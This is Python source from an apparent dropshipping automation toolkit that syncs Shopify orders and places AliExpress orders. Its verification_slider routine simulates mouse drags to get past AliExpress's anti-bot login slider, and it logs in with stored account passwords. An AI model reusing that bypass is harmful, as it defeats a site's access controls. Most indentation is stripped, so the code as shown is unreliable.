data = sorted([new_dict(i,["companyDisplayName","price"]) for i in x if i.companyDisplayName in sorted_companies_list],key=lambda i:sorted_companies_list.index(i.companyDisplayName))
return flt(data[0].price)
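    # Hedged example of the selection logic: the shipping entries are filtered to the allowed
    # companies and ordered by that list's priority (not by price), so with
    #   x = [AD(companyDisplayName="ePacket", price=2.5), AD(companyDisplayName="SunYou Economic Air Mail", price=1.1)]
    # and Allow_Additional_Shipping_Methods enabled, get_shipping_cost returns 1.1 because
    # SunYou ranks ahead of ePacket in the priority list.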
def get_shipping_company(self,x,shop):
sorted_companies_list = ifelseget(lambda:Shop()(shop).Allow_Additional_Shipping_Methods,lambda:["SunYou Economic Air Mail","Yanwen Economic Air Mail","China Air Post","China Post Registered Air Mail","ePacket","AliExpress Standard Shipping"],lambda:["ePacket"])
data = sorted([new_dict(i,["companyDisplayName","price"]) for i in x if i.companyDisplayName in sorted_companies_list],key=lambda i:sorted_companies_list.index(i.companyDisplayName))
return data[0].companyDisplayName
class Variant_Titler:
def title_variant(self,x):
products = getshopifyproducts("rom",created_at_min=datetime(2020, 1, 19, 23, 8, 13))
option_names = []
for i in products:
for j in i.variants:
option_names.append(j.option1)
option_names.append(j.option2)
option_names.append(j.option3)
option_names = sorted(oset(listminus(option_names,None)))
option_names = lmap(lambda i:re_found_function(i,"(?i)^asian",lambda i:re_substitute(i,["(?i)^asian",""]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)cm",lambda i:re_substitute(re_substitute_function(i,"[\d\.]+",lambda i:or_list(lambda:list_and(lambda:str(round(flt(i)/2.54,1)).endswith(".0"),lambda:str(int(round(flt(i)/2.54,1)))),lambda:str(round(flt(i)/2.54,1)))),["(?i)cm","cm"]) ),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)^For",lambda i:re_substitute(i,["(?i)^For",""]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)iPhone",lambda i:re_substitute(i,["(?i)iPhone","iPhone"]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)Style",lambda i:i),option_names)
option_names = lmap(lambda i:re_found_function(i," {2,}",lambda i:re_substitute(i,[" {2,}"," "])),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)eu size",lambda i:re_substitute(i,["(?i)eu size",""]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)^Size[- ]",lambda i:re_substitute(i,["(?i)^Size[- ]",""]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)(^A\d+)",lambda i:re_substitute(i,["(?i)(^A\d+)","Samsung \\1"]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)(^J\d+)",lambda i:re_substitute(i,["(?i)(^J\d+)","Samsung \\1"]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)(^P\d+)",lambda i:re_substitute(i,["(?i)(^P\d+)","Huawei \\1"]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)^Galaxy",lambda i:re_substitute(re_substitute(i,["(?i)^Galaxy","Samsung Galaxy"]),["Samsung Galaxy","Samsung"]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)(^P Smart)",lambda i:re_substitute(i,["(?i)(^P Smart)","Huawei \\1"]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)(\d+)Xl",lambda i:re_substitute(i,["(?i)(\d+)Xl","\\1XL"]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)((?:^Xl$|^Xs$))",lambda i:re_substitute(i,["(?i)((?:^Xl$|^Xs$))","\\1"]).upper()),option_names)
        option_names = sorted(oset(option_names))
        return option_names
def run(self):
products = getshopifyproducts("rom",created_at_min=datetime(2020, 1, 19, 23, 8, 13))
for a in products:
for b in a.variants:
for c in [1,2,3]:
if getattr(b,"option%s"%(c)) != None:
old = getattr(b,"option%s"%(c))
setattr(b,"option%s"%(c),adjustvariantname(getattr(b,"option%s"%c)))
print(old, getattr(b,"option%s"%(c)))
            pool(lambda a=a: apilimitcall(a.save))  # bind a now so the pooled call saves this product, not a later one
time.sleep(1)
class Product_Manager:
    def __init__(self, sleeptime = 3600 * 3):
        # Loop rather than recursing into __init__, which would eventually exhaust the recursion limit.
        while True:
            Aliexpress_Products().refresh_product_inventories()
            blueprint("[sleeping][%s]"%sleeptime)
            time.sleep(sleeptime)
class Product_Unpender:
def __init__(self):
strand( Aliexpress_Products().create_product )
class Product_Handles:
    # Basically, it shows the day's sales for all shops and, if clicked, shows the adsets.
def __init__(self):
import rumps
from rumps import MenuItem as M
from rumps import MenuItem
        self.app = rumps.App("Product_Handles",quit_button=None)
globals().update(locals())
self.set_menu()
#process( lambda: [time.sleep(6.15), self.set_menu()] )
time.sleep(4)
self.app.run()
def set_menu(self):
keys = list(self.app.menu.keys())
redprint(keys)
for i in keys:
self.app.menu.pop(i)
keycall("Icon",All(Adset))
self.app.menu = [MenuItem("/",callback=lambda _=None:[])]+[
MenuItem("") for i in All(Handle)
]
class ProductUpdates:
def run(self,shop):
for i in Filter(Product,shop=shop):
i.Refresh()
def create_products_via_csv(infile):
data = CSV().DictRead(infile)
[Aliexpress(c=20, verbose=False).create_product(**row) for row in data[350:]]
affix_product_descriptions()
def sort_collections():
pass
def theme():
@timedtask
def theme():
os.system("/Applications/Google\ Chrome\ 70.app/Contents/MacOS/Google\ Chrome &")
os.system("/Applications/Adobe\ Photoshop\ CC\ 2018/Adobe\ Photoshop\ CC\ 2018.app/Contents/MacOS/Adobe\ Photoshop\ CC\ 2018 &")
redinput(" Theme -- ")
def unpend_orders():
Order_Unpender().unpend_orders()
class eCommerce_Item_Enlivener(DecisionTree):
def wordcount(self, x):
apostrophes = x.count("'")
words = len(x.split(" "))
count = apostrophes + words
return count
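    # Worked example (hedged): wordcount("it's a beautiful day") -> 1 apostrophe + 4 space-split
    # words = 5; apostrophes are counted on top of the split, so contractions weigh slightly more.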
def wordcount_by_productIds(self, x, shop):
return [eCommerce_Item_Enlivener().wordcount(Shop()(shop).pfind(id_=i).body_html) for i in x]
def format_products_feed1(self, shop):
x = [i.split("/")[-1] for i in get_all_chrome_urls() if "/products/" in i]
x = [Shop()( shop).pfind(handle=i)[0] for i in x]
[[setattr(i,"body_html",""),i.save()] for i in x]
y = ""
y += "\n"
for i in x:
y += "url: " + "https://"+Shop()(shop).Shopify_App_API_Url.split("@")[1]+"/products/%s"%i.id
y += "\n"
y += "words: "
y += "\n"
y += "\n"
with open(homepath("~/tavern/tavern/bag/%s"%datetime.now().strftime("%m_%d_%Y_set.txt")), "w") as f:
f.write(y)
def format_products_feed(self, io=None):
io = get_all_chrome_urls() if(None==io) else io
y = ""
y += "\n"
data = []
if(type(io[0]) == str):
for i in io:
                SHOP = Get(Shop,Domain_Name__icontains=re.findall("[a-zA-Z]+\.com",i)[0])
p = Shop()( SHOP.shop_abbreviation ).pfind(handle=i.split("/")[-1])[0]
data.append(p)
else:
data = io
for p in data:
SHOP = Shop()(Get(Shop,Business_Name=p.vendor).shop_abbreviation)
p.body_html = ""; p.save()
y += "url: " + "https://"+SHOP.Shopify_App_API_Url.split("@")[1]+"/products/%s"%p.id
y += "\n"
y += "words: "
y += "\n"
y += "\n"
with open(homepath("~/tavern/tavern/bag/%s"%datetime.now().strftime("%m_%d_%Y_set.txt")), "w") as f:
f.write(y)
def read(self):
address = input("address?: ")
shop = input("shop?: ")
wordsum = sum( [int(i) for i in re.findall("[\n ]([0-9][0-9])[\n ]",open(address).read()+"\n")] )
productIds = [int(i) for i in re.findall("[/]([0-9][0-9][0-9][0-9]+)[\n ]",open(address).read()+"\n")]
wordcount = eCommerce_Item_Enlivener().wordcount_by_productIds(productIds, shop = shop)
redprint("wordsum: %s" % wordsum, "wordcount: %s" % wordcount, "productIds: %s" % productIds)
def a_shop():
return Shop()(All(Shop)[0].shop_abbreviation)
""" Business-Utils-Order-Utils """
def aliexpress_dialog_box_adjust_city(city):
city = city.upper()
if "ST." in city:
redprint("ST. in %s, replacing ST. with SAINT" % (city))
city = city.replace("ST.", "SAINT")
city = city.replace("'", "")
city = city.capitalize()
return city
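# Worked example (hedged): aliexpress_dialog_box_adjust_city("St. Louis") -> upper-cases to
# "ST. LOUIS", swaps "ST." for "SAINT", strips apostrophes, then .capitalize() leaves
# "Saint louis" (only the first letter stays upper-cased).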
def alitracker(*args):
print(args)
order = Get(Order,order_number=int(args[1]))
x = Filter(Lineitem,shop=args[0],order_id=order.id)
if x:
return Get(Lineitem,shop=args[0],order_id=order.id).ali_tracking_number
else:
return "Unable to get tracking number for order number %s in %s. It is not available yet." % (args[1],args[0])
def calculate_average_shipping_time():
x = Lineitem.objects.filter(~Q(ali_tracking_number=None))
keycall("get_tracking_events",x)
no_data = [i for i in x if i == None]
delivered = [i for i in x if i != None and "DELIVERED" in i.events()[-1].upper()]
delivering = [i for i in x if i != None and "DELIVERED" not in i.events()[-1].upper()]
assert len(delivered) + len(delivering) + len(no_data) == len(x)
average_delivered_times = [(i.events()[-1].date()-i.events()[0].date()).days+(((i.events()[-1].date()-i.events()[0].date())).seconds/(24*60*60)) for i in delivered]
average_delivered_time_days = tryreturn(lambda:sum(average_delivered_times)/len(average_delivered_times))
average_delivered_time_business_days = average_delivered_time_days * (5/7)
average_delivered_time = average_delivered_time_business_days
average_delivered_times = [round(i,2) for i in average_delivered_times]
average_delivering_times = [(i.events()[-1].date()-i.events()[0].date()).days+(((i.events()[-1].date()-i.events()[0].date())).seconds/(24*60*60)) for i in delivering]
average_delivering_time_days = tryreturn(lambda:sum(average_delivering_times)/len(average_delivering_times))
average_delivering_time_business_days = average_delivering_time_days * (5/7)
average_delivering_time = average_delivering_time_business_days
average_delivering_times = [round(i,2) for i in average_delivering_times]
distinct_print(ordered_json_dumps({a:b for a,b in locals().items() if "average" in a}))
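# Note on the arithmetic above (hedged): delivery spans are measured from the first to the last
# tracking event in calendar days, then scaled by 5/7 to approximate business days, e.g. a
# 21-calendar-day span reports as roughly 15 business days.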
def lineitemsFeed(shop, date_range=36):
shop=((Shop()(shop))if(type(shop)==str)else(shop))
ordersFeed(shop, date_range=date_range)
    # Broken orders should already have been deleted by now.
x = 0
for order in Order.objects.filter(shop=shop.shop_abbreviation):
for lineitem in order.line_items:
lineitem = AttrDict(lineitem) #
new = Lineitem()
existing = Lineitem.objects.filter(id=lineitem.id)
if len(existing) != 0:
new = existing[0]
# [shop, order, lineitem]
new.shop = shop.shop_abbreviation; #print("abbre: %s" % shop.shop_abbreviation)
new.financial_status = order.financial_status
new.id = lineitem.id
new.variant_id = lineitem.variant_id
#if "product_id" not in new.__dict__.keys():
# greenprint("product id is not inside existing lineitem __dict__ keys. add it in.")
try:
int(new.product_id)
except Exception as e:
magentaprint("[disregard [lineitem.product deleted]] Error, %s [setting a new product_id [%s] for line_item %s] -- [lineitem.product_id == None, lineitem.product deleted]"%(e,lineitem.product_id,lineitem.id))
new.product_id = lineitem.product_id
#else:
# redprint("product id is inside existing lineitem __dict__ keys. not add it in.")
new.order_id = order.id
new.quantity = lineitem.quantity
new.grams = lineitem.grams
new.fulfillment_tracking_numbers = []
new.date = order.date
new.created_at = order.created_at
if new.created_at < Shop()(shop.shop_abbreviation).Lineitem_Most_Recent_Date:
continue
for i in order.fulfillments:
for j in i["line_items"]:
if j["id"] == lineitem.id:
#try:
new.fulfillment_id = i["id"]
tracking_numbers = i.get("tracking_numbers", None)
if tracking_numbers != None:
new.fulfillment_tracking_numbers.extend(tracking_numbers)
#except:
# return j
new.fulfillment_service = lineitem.fulfillment_service # [added 4/21/19]
new.fulfillment_status = lineitem.fulfillment_status
new.variant_title = lineitem.variant_title
new.title = lineitem.title
new.sku = lineitem.sku
#if order.total_line_items_price == None:
# new.price = order.total_price
#else:
# evened_shipping_price = ((float(order.total_price) - order.total_line_items_price) / len(order.line_items)) #Calculate Shipprice via Total-price-lineitemsprice and Divide that by # lineitems.
# old = float(lineitem.price)
# new.price = float(lineitem.price) + evened_shipping_price
# print(order.id, 'old: ', old, evened_shipping_price, "new with even, %s" % new.price)
new.price = float(lineitem.price) + ((float(order.total_price) - order.total_line_items_price) / len(order.line_items)) if order.total_line_items_price != None else order.total_price
# new.ali_price (nothingtodohere)
# new.ali_tracking_number (nothingtodohere)
# new.ali_tracking_method (nothingtodohere)
# new.ali_order_number (nothingtodohere)
new.shipping_address = order.shipping_address
# new.e2 # time between fulfillment and tracking number post
# new.e1 # time between orderplacement and fulfillment
# new.t3 # time tracking number posts
# new.t2 # time fulfilled
new.t1 = Date().myDatetimenow(order.created_at) # (TypeError: can't subtract offset-naive and offset-aware datetimes)
# datetime.datetime(2018, 3, 4, 6, 49, 19, tzinfo=tzoffset(None, -18000))
new.save()
#print( " saving: %s " % new.save() )
x += 1
OSA.notify(str(x))
# lineitemsFeed(a_shop())
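# Hedged note on the price evening in lineitemsFeed: when an order exposes total_line_items_price,
# each line item gets price + (total_price - total_line_items_price) / len(line_items), i.e. the
# shipping is split evenly across the items. Example: total 30.00, items sum 24.00, 3 line items
# -> each line item is credited an extra 2.00.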
def onyx(e=None):
# lmao, this also works.
return onyx_lineitems(e)
def onyx_lineitems(e=None):
# lmao, this also works.
x = All(Lineitem)
data = []
for i in x:
to_add = True
if i.financial_status == "refunded":
to_add = False
if i.fulfillment_status == "unfulfilled":
to_add = False
if i.fulfillment_status == None:
to_add = False
if to_add == True:
assert i.fulfillment_status in ["partial"] or i.fulfillment_status in ["fulfilled"]
if to_add == True:
data.append(i)
not_refunded = Filter(Lineitem,(~Q(financial_status="refunded")))
if e == None:
return data
elif e == "e1":
        return [i for i in not_refunded if i.t1 and not i.t2] # use not_refunded here: anything not refunded and still missing t2 has not been fulfilled yet, so it is effectively unfulfilled; partial/fulfilled items are kept too, just in case.
elif e == "e2":
return [i for i in data if i.t2 and not i.t3]
elif e == "e3":
return [i for i in data if i.t3 and not i.t4]
elif e == "e4":
return [i for i in data if i.t4]
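# Hedged summary of the e1..e4 buckets above, mirroring the t1..t4 timestamps noted in
# lineitemsFeed: e1 = created but not yet fulfilled (t1, no t2), e2 = fulfilled but no tracking
# number posted yet (t2, no t3), e3 = tracking posted but no t4 yet, e4 = t4 set (presumably
# delivered).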
def onyx_orders():
not_refunded = Filter(Order,(~Q(financial_status="refunded")))
partially_fulfilled = not_refunded.filter(fulfillment_status="partial")
fulfilled = not_refunded.filter(fulfillment_status="fulfilled")
W = list(partially_fulfilled) + list(fulfilled)
redprint("ONYX ORDERS REIGNED %s ORDERS" % len(W))
return W
def ordersCreate():
print("ordersCreating...")
def ordersFeed(shop, date_range=36):
shop=((Shop()(shop))if(type(shop)==str)else(shop))
print("Setting Orders in last %s days"%date_range)
orders = sum([shop.shopify.Order.find(status='any',limit=250, page=pg, created_at_min=Date().dt(-1 * date_range,'%Y-%m-%d')) for pg in range(1, 1+ceil(shop.shopify.Order.count(created_at_min=(Date()-date_range).dateobj ) /250)) ],[])
payload = []
for i in orders:
x = i.to_dict()
x["created_at"] = Date().parse_date(x["created_at"]).replace(tzinfo=None)
x['date'] = x["created_at"].date()
x['shop'] = shop.init_shop
x["billing_address_contact_name"] = "%s %s"%(x["billing_address"]["first_name"],x["billing_address"]["last_name"])
if x['fulfillment_status'] is None:
x['fulfillment_status'] = 'null'
x["line_items"] = [{f:r[f] for f in ["fulfillment_service","fulfillment_status","gift_card","grams","id","name","price","product_exists","product_id","quantity","sku","title","total_discount","total_discount_set","variant_id","variant_inventory_management","variant_title",]} for r in x["line_items"]]
SecondaryAction().take_from_order(x)
payload.append(x)
Order.objects.update_or_create(**x)
    # I cancelled an order that was a test to myself, so it could not be filtered; delete it manually.
return payload
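# Hedged note on the pagination above: ordersFeed asks Shopify for ceil(order_count / 250) pages
# of 250 orders each within the date window, so e.g. 612 orders -> 3 requests (pages 1..3).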
def ordersTrack():
print("...summoning ordersTrack...")
payload = []
for i in range(10):
data = {}
payload.append(data)
print("orders_tracking_core payload: %s"%payload)
return payload
def query_google_tracking_urls(tracking_number):
return re.findall(r'http.*?"',requests.get("https://www.google.com/async/lrfapt?ei=2grpW47TMKza5gKd16vIAg&yv=3&async=lrfsb:{},_id:lrf-pt-async,_pms:s,_fmt:pc".format(tracking_number)).text)
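# Rough usage sketch (hedged): query_google_tracking_urls("LX123456789CN") hits Google's async
# package-tracking endpoint and returns whatever http... URLs appear in the response, typically
# carrier tracking pages for that number.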
def similarimagesCreate():
print("similarimagesCreating...")
# exec(boot_django)
def test_variant_names():
return chromejs("x = document.getElementsByClassName('sku-property-list'); y = x.length; var a = []; for (i=0;i<y;i++) { z = x[i].getElementsByTagName('img'); if(z.length > 0){a.push(...z)}; b = x[i].getElementsByClassName('sku-property-text'); if (b.length > 0) {a.push(...b)} } ; a; c = []; e = a.length; for (i=0;i<e;i++) {if(a[i].title) {c = c.concat(a[i].title)}; if(a[i].textContent) {c = c.concat(a[i].textContent)} }; c")
def update_address():
shop, order_number = dune(OSA.log("Shop abbreviation and order number to update an address for [separated by ', ', for example: 'xyz, 1001']?").split(", "),[lambda i: i,lambda i:int(i)])
name, address1, address2, city, state, zip_code = None, None, None, None, None, None
x = OSA.log("Updated shipping address [For example: Adam Watson, 123 A St, Address Line 2 (optional), City A, State, Zip Code]?").split(", ")
if len(x) == 6:
name, address1, address2, city, state, zip_code = x
elif len(x) == 5:
name, address1, city, state, zip_code = x
updated_shipping_address = {"name":name,"address1":address1,"address2":address2,"city":city,"province":state,"zip_code":zip_code}
order = Get(Order,shop=shop,order_number=order_number)
lineitems = Filter(Lineitem,order_id=order.id)
lmap(lambda i: Update(i, updated_shipping_address = updated_shipping_address), lineitems)
updated_shipping_addresses = key("updated_shipping_address",lineitems)
updated_shipping_addresses_x = oset(updated_shipping_addresses)
assert len(updated_shipping_addresses_x) == 1
updated_shipping_address_x = updated_shipping_addresses_x[0]
if updated_shipping_address_x["address2"] != None:
OSA.log("Updated shipping address:\n%s, %s, %s, %s, %s, %s"%(updated_shipping_address_x["name"], updated_shipping_address_x["address1"], updated_shipping_address_x["address2"], updated_shipping_address_x["city"], updated_shipping_address_x["province"], updated_shipping_address_x["zip_code"]),tp=False)
elif updated_shipping_address_x["address2"] == None:
OSA.log("Updated shipping address:\n%s, %s, %s, %s, %s"%(updated_shipping_address_x["name"], updated_shipping_address_x["address1"], updated_shipping_address_x["city"], updated_shipping_address_x["province"], updated_shipping_address_x["zip_code"]),tp=False)
def verification_slider(self):
try:
count_of_verification_slider_elements = self.ss.ffss("label","for","fm-login-checkcode")
if len(count_of_verification_slider_elements) == 1:
##
def move_verification_slider(x1=431, x2=574, y1=273, signin_x1=571, signin_y1=304):
print("Found verification slider.")
OSA("Firefox")
self.ss.zoom_out()
self.ss.zoom_in(1)
zz(2)
os.system("~/tavern/tavern/.MouseTools -x %s -y %s; sleep 1" % (x1, y1))
os.system("~/tavern/tavern/.MouseTools -x %s -y %s; sleep 0" % (x1, y1))
os.system("~/tavern/tavern/.MouseTools -doubleLeftClick; sleep 2")
os.system("~/tavern/tavern/.MouseTools -leftClickNoRelease; sleep 0.5")
os.system("~/tavern/tavern/.MouseTools -x %s -y %s; sleep 1" % (x2, y1))
os.system("~/tavern/tavern/.MouseTools -releaseMouse; sleep 0.2")
os.system("~/tavern/tavern/.MouseTools -leftClick; sleep 2")
os.system("~/tavern/tavern/.MouseTools -x %s -y %s; sleep 0" % (x1+15, y1))
os.system("~/tavern/tavern/.MouseTools -leftClick; sleep 2")
OSA("Firefox")
self.ss.find_element_by_name("password").clear()
self.ss.find_element_by_name("password").send_keys(password)
OSA("Firefox", ["return"])
zz(10)
self.ss.refresh()
try:
self.ss.switch_to_frame("alibaba-login-box")
self.ss.find_element_by_name("loginId").clear()
self.ss.find_element_by_name("loginId").send_keys(username)
self.ss.find_element_by_name("password").send_keys(password)
self.ss.find_element_by_name("submit-btn").send_keys(self.ss.Keys.ENTER)
except Exception as e:
print("error: %s" % e)
zz(15)
move_verification_slider()
##
except Exception as e:
print("No slider.")
class Aliexpress_Requests:
def __init__(self,window_index=[0,0,3.5,3.5],ph=True,exit_browser=True):
setattrs(self,"ph",ph,"exit_browser",exit_browser,"window_index",window_index,"headers",session_headers,"username",Get(Shop,shop_abbreviation=Muta()().store_abbre).AliExpress_Email,"password",Get(Shop,shop_abbreviation=Muta()().store_abbre).AliExpress_Password,)
if(tryreturn(lambda: cookies_to_session(cookies_to_database(self.username, "AliExpress"), requests.Session()).get("https://trade.aliexpress.com/orderList.htm",headers=session_headers).url.find("aliexpress.com/orderList.htm"))>0):
tryprocess(lambda: cookies_to_database(username=self.username,website_name="AliExpress",cookies=self.ss.get_cookies(),reverse=False))
self.rq = cookies_to_session(cookies_to_database(self.username, "AliExpress"), requests.Session())
self.rq.headers = session_headers
return
else:
self.ss = Browser()( ("ch+"if(True==self.ph)else("sele")) ).get("https://login.aliexpress.com/").sp(5).tp(lambda:globe("ss_v").frame("alibaba-login-box")).bat().fid("fm-login-id").fid("fm-login-password").fcn("password-login").bat(self.username,self.password,globe("ss_v").SHADOW.ENTER).sp(10).tp(lambda: cookies_to_database(username=self.username,website_name="AliExpress",cookies=globe("ss_v").get_cookies(),reverse=False)).tp(lambda:setattr(self,"rq",cookies_to_session(cookies_to_database(self.username,"AliExpress"),requests.Session()))).tp(lambda:globe("ss_v").quit()if(self.exit_browser)else())
self.__init__(window_index=window_index,ph=ph,exit_browser=exit_browser)
def __call__(self):
return self.rq
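# Hedged usage sketch: Aliexpress_Requests()() yields a requests.Session preloaded with AliExpress
# cookies (restored from the database when still valid, otherwise refreshed via a Selenium login),
# which is how Aliexpress_Products and Aliexpressorderpager fetch authenticated pages.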
class Aliexpressorderpager:
def get_urls(self, x1, x2, get_order_info = True):
# x1,x2,get_order_info=(Date()-15)(),(Date()-0)(),False
session = Aliexpress_Requests()()
r = session.get("https://trade.aliexpress.com/orderList.htm")
if r.status_code != 200: OSA.log("Error in requesting Aliexpress orders. Some things that can cause this is using a vpn or a using a vps. Please make sure your password is correct as well")
soup = tryreturn(lambda:BeautifulSoup(Replacements(r.content.decode(),"\n", "", "\r", "", "\t", ""), "lxml"))
if soup == 0: OSA.log("Error in requesting Aliexpress orders. Some things that can cause this is using a vpn or a using a vps. Please make sure your password is correct as well")
m_page = (or_list(lambda:[int(i.text) for i in soup.findAll(attrs={"class": "ui-goto-page"})[::-1] if i.text.isdigit()][0],0)) + 1
print('max ', m_page)
for page in range(0, m_page):
_csrf_input = soup.find(attrs={"name": '_csrf_token'})
if _csrf_input == None:
return
csrf = _csrf_input.attrs["value"]
if a_shop().AliExpress_Most_Recent_Date > x1:
x1 = Date(a_shop().AliExpress_Most_Recent_Date)
if a_shop().AliExpress_Most_Recent_Date > x2:
x2 = Date(a_shop().AliExpress_Most_Recent_Date)
query = {
"action": "OrderListAction",
"eventSubmitDoPage": "doPage",
"_fm.o._0.s":(x1).strftime("%m/%d/%Y"),
"_fm.o._0.e":(x2).strftime("%m/%d/%Y"),
"_fm.o._0.cu": page,
"pageNum": page + 1,
"_csrf_token": csrf}
print("Wait...")
time.sleep(2)
r = session.post("https://trade.aliexpress.com/orderList.htm", data=query)
if r.status_code != 200: OSA.log("error in requesting Aliexpress orders. Some things that can cause this is using a vpn or a using a vps. Please make sure your password is correct as well")
soup = BeautifulSoup(Replacements(r.content.decode(),"\n", "", "\r", "", "\t", ""), "lxml")
order_ids = lmap(lambda i: int(findall(i.attrs["href"],"orderId=(.*)")[0]), soup.findAll(attrs={"class": "view-detail-link"}))
order_times = [Date().myDatetimenow(Date().parse_date(i.text)) for i in soup.findAll("span", attrs={"class":"info-body"}) if tryprocess(lambda: Date().parse_date(i.text)) == 1]
print("len order ids: %s" % len(order_ids))
print("Get order list Success, current page is %s" % (page + 1))
links = soup.findAll(attrs={"class": "view-detail-link"})
exec(subtract)
# AliExpress_Account_Order_Scan_Earliest_Date
lmap(lambda i: Push(Aliexpressorder,id=i[0])(order_time=i[1]) , list(zip(order_ids,order_times)))
if len(order_ids) == 0:
return
if get_order_info == True:
for order_id, order_time in zip(order_ids, order_times):
                    pool(lambda order_id=order_id, order_time=order_time: Aliexpressorder().order_info(order_id, order_time))  # bind the loop values now so the pooled call uses this order
time.sleep(1)
""" 'x1 = Date()-400\nx2 = Date() - 0\nget_order_info = True\nr = Aliexpress_Requests()().get("https://trade.aliexpress.com/orderList.htm")\nif r.status_code != 200: OSA.log("Error in requesting Aliexpress orders. Some things that can cause this is using a vpn or a using a vps. Please make sure your password is correct as well")\nsoup = tryreturn(lambda:BeautifulSoup(Replacements(r.content.decode(),"\\n", "", "\\r", "", "\\t", ""), "lxml"))\nif soup == 0: OSA.log("Error in requesting Aliexpress orders. Some things that can cause this is using a vpn or a using a vps. Please make sure your password is correct as well")\nm_page = (or_list(lambda:[int(i.text) for i in soup.findAll(attrs={"class": "ui-goto-page"})[::-1] if i.text.isdigit()][0],0)) + 1\nprint(\'max \', m_page)\nfor page in range(0, m_page):\n _csrf_input = soup.find(attrs={"name": \'_csrf_token\'})\n csrf = _csrf_input.attrs["value"]\n query = {\n "action": "OrderListAction",\n "eventSubmitDoPage": "doPage",\n "_fm.o._0.s":(x1).strftime("%m/%d/%Y"),\n "_fm.o._0.e":(x2).strftime("%m/%d/%Y"),\n "_fm.o._0.cu": page,\n "pageNum": page + 1,\n "_csrf_token": csrf}\n print("Wait...")\n time.sleep(2)\n response = Aliexpress_Requests()().post("https://trade.aliexpress.com/orderList.htm", data=query)\n if response.status_code != 200: OSA.log("error in requesting Aliexpress orders. Some things that can cause this is using a vpn or a using a vps. Please make sure your password is correct as well")\n\n soup = BeautifulSoup(Replacements(r.content.decode(),"\\n", "", "\\r", "", "\\t", ""), "lxml")\n order_ids = lmap(lambda i: int(findall(i.attrs["href"],"orderId=(.*)")[0]), soup.findAll(attrs={"class": "view-detail-link"}))\n order_times = [Date().myDatetimenow(Date().parse_date(i.text)) for i in soup.findAll("span", attrs={"class":"info-body"}) if tryprocess(lambda: Date().parse_date(i.text)) == 1]\n print("len order ids: %s" % len(order_ids))\n print("Get order list Success, current page is %s" % (page + 1))\n\n if len(order_ids) > 0 and get_order_info == True:\n for order_id, order_time in zip(order_ids, order_times):\n Aliexpressorder().order_info(order_id, order_time)\n time.sleep(1)\n' """
class Order_Unpender:
def __init__(self,window_index=[0,0,3.5,3.5],ph=False,exit_browser=False):
setattrs(self,"ph",ph,"exit_browser",exit_browser,"window_index",window_index,"headers",session_headers,"username",Get(Shop,shop_abbreviation=Muta()().store_abbre).AliExpress_Email,"password",Get(Shop,shop_abbreviation=Muta()().store_abbre).AliExpress_Password,)
self.ss = Browser()( ("ch+"if(True==self.ph)else("sele")) ).get("https://login.aliexpress.com/").sp(5).tp(lambda:globe("ss_v").frame("alibaba-login-box")).bat().fid("fm-login-id").fid("fm-login-password").fcn("password-login").bat(self.username,self.password,globe("ss_v").SHADOW.ENTER).sp(10).tp(lambda: cookies_to_database(username=self.username,website_name="AliExpress",cookies=globe("ss_v").get_cookies(),reverse=False)).tp(lambda:setattr(self,"rq",cookies_to_session(cookies_to_database(self.username,"AliExpress"),requests.Session()))).tp(lambda:globe("ss_v").quit()if(self.exit_browser)else())
def __call__(self_):
# Exec("x_shop = Muta()().store_abbre\nLineitemsFeed().LineitemsFeed(x_shop)\nunfulfilled_orders = keyby(lambda i: InceptedProduct().RScan(id=i.product_id).ali_url, list(tcer(Lineitem.objects.filter(fulfillment_status=None, financial_status='paid', shop=x_shop))))",globals(),locals())
""" Exec = exec; self_ = self """
x_shop = Muta()().store_abbre
LineitemsFeed().LineitemsFeed(x_shop)
unfulfilled_orders = keyby(lambda i: InceptedProduct().RScan(id=i.product_id).ali_url, list(tcer(Lineitem.objects.filter(fulfillment_status=None, financial_status='paid', shop=x_shop))))
# """
if not unfulfilled_orders: return (print("Waiting"), sp(60), self_())
# """
setattrs(self_,"seed_order",
lambda:unfulfilled_orders[-1],
"shop",lambda:Shop()(self_.seed_order.shop),
"real_order",lambda:Get(Order,id=self_.seed_order.order_id),
"orders",lambda:lmap(lambda i:Get(Lineitem,id=AttrDict(i).id), keyby(lambda i: (InceptedProduct().RScan(id=AD(i).product_id).aliexpressvendor) == (InceptedProduct().RScan(id=self_.seed_order.product_id).aliexpressvendor), self_.real_order.line_items)),
"fulfilled_line_items",lambda:[])
print(self_.seed_order)
Exec('globalise(lmap(lambda i: AttrDict(i.to_dict()), Shop()(x_shop).shopify.OrderRisk.find(order_id=self_.seed_order.order_id)),"a")\nif(globe("a") != []):\n if (max(set(lmap(lambda i:float(i),sud("score",globe("a")))))>=0.5 or "cancel" in sud("recommendation",globe("a"))):\n OSA.log("Please go to %s in your browser and cancel or refund any high fraud order items"%("%s/orders/%s"%(self_.shop.Administrative_Url,self_.seed_order.id)))\n (0/0)\nelse:\n x = OSA.log("Order Risk Details\\n\\nScores: %s\\nMessages: %s\\nRecommendations: %s\\n\\n\\nContinue?"%(Join(", ",sud("score",globe("a"))),Join(", ",sud("message",globe("a"))),Join(", ",sud("recommendation",globe("a")))),tp=False,buttons=["No","Yes"])\n if x == "Yes":\n (OSA.log("Continuing",tp=False))\n else:\n (0/0)',globals(),locals())
self_.ss.get("https://shoppingcart.aliexpress.com/shopcart/shopcartDetail.htm?").tp(lambda:lmap(lambda i: (i.click(),sp(2),self_.ss.ffst("button","OK").click().sp(5)), self_.ss.jtns("button",0,{"ae_button_type":"remove"})))
shipping_address = or_list(lambda:self_.seed_order.updated_shipping_address,lambda:self_.seed_order.shipping_address)
